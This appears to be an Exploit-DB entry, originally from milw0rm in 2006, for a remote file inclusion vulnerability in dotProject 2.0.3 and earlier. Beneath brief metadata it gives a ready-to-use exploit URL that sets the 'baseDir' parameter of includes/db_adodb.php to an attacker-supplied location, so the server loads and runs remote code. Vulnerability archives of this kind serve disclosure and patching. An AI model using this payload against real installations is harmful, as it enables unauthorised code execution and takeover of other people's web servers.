dotProject 2.0.3 - 'baseDir' Remote File Inclusion

EDB-ID:

1934

CVE:

N/A

Author:

h4ntu

Type:

webapps

Platform:

PHP

Published:

2006-06-20

Credits : h4ntu
Title : dotProject <= 2.0.3 Remote File Inclusion
URL : http://www.dotproject.net/
Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 

# milw0rm.com [2006-06-20]